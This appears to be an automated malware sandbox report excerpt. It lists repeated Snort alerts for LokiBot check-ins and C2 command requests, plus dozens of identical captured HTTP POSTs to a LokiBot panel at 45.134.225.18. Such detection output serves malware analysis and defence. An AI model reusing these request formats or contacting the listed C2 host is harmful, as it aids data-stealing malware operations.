                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49806 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49807 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49807 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49807 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49807 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49807 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49808 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49808 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49808 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49808 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49808 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49809 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49809 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49809 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49809 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49809 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49810 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49810 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49810 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49810 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49810 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49811 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49811 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49811 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49811 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49811 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49812 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49812 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49812 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49812 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49812 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49813 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49813 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49813 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49813 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49813 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49814 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49814 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49814 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49814 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49814 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49815 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49815 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49815 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49815 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49815 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49816 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49816 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49816 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49816 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49816 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49817 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49817 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49817 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49817 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49817 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49818 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49818 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49818 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49818 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49818 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49819 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49819 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49819 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49819 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49819 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49820 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49820 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49820 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49820 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49820 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49821 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49821 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49821 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49821 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49821 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49822 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49822 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49822 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49822 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49822 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49823 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49823 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49823 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49823 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49823 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49824 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49824 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49824 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49824 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49824 -> 45.134.225.18:80
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.134.225.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FB126016Content-Length: 165Connection: close
